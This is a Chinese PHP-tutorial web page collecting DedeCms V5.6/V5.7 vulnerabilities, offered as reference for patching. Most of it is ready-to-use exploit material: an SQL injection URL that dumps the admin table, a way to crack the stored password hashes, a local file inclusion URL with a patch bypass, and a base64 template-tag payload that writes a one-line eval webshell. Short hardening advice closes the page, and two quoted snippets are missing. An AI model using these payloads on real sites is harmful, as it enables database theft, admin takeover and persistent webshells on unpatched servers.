来源:自学PHP网 时间:2014-11-30 17:03 作者: 阅读:次
[导读] 昨天自己的一个网站中毒了,花了N天时间没有找出来,前天没事搜索了一下dedecms漏洞,结果发现V5 6 V5 7漏洞一堆一堆的,下面我收集了现在Dedec...
Dedecms V5.6/V5.7漏洞问题收集总结昨天自己的一个网站中毒了,花了N天时间没有找出来,前天没事搜索了一下dedecms漏洞,结果发现V5.6/V5.7漏洞一堆一堆的,下面我收集了现在Dedecms V5.6/V5.7漏洞问题,大家保参考然后进行修补吧. DedeCms v5.6-5.7 最新漏洞 拿 WebShell EXP (5.18) 前题条件,必须准备好自己的dede数据库,然后插入数据,以下是引用片段:
再用下面表单提交,shell 就在同目录下 1.php,原理自己研究,以下是引用片段:
此问题官方还没有解决办法,个人建义删除mytag_js.php文件,并把数据表中的XX_mytag表的中的text类开的字段修改,并且限制最多为1字节. DedeCms V5.6注入+本地包含0day 一、advancedsearch.php注入0day plus/advancedsearch.php $sql 变量未初始化,导致鸡助注入,原理不多说自已百度去,直接EXP,代码如下: http://www.xxx.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin` dede的密码破解方法是32位MD5减去头5位,减去尾七位,得到20MD5密码,方法是,前减3后减1,得到16位MD5. 二、carbuyaction.php本地包含鸡助0day 漏洞文件:plus/carbuyaction.php 还是原理不多说自已百度去,直接EXP,代码如下: http://www.xxx.com/plus/carbuyaction.php?dopost=return&code=../../ 如果打了补丁在cookie中加上code=alipay继续使用,再暴一个BUG,直接访问如下地址 http://www.dedecms.com/plus/carbuyaction.php?dopost=return&dsql=xx 暂时没什么利用价植,BUG一个. DedeCms v5.6 恶意代码执行漏洞 DedeCms v5.6漏洞描述: 在上传软件的地方,对本地地址没有进行有效的验证,可以被恶意利用,测试方法:注册会员,上传软件,本地地址中填入 a{/dede:link}{dede:toby57 name="'']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行,代码如下: a{/dede:link}{dede:toby57 name="'']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57} 生成x.php 密码:xiao直接生成一句话,密码xiao 大家懂得SEBUG安全建议: 厂商补丁:DEDECMS 目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本. 个人教训:我们可把upload,data目录设置不可执行和php文件,plus目录设置不要写任何文件,把不要的文件删除,模板目录最好也不可以上传和修改任何文件. |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com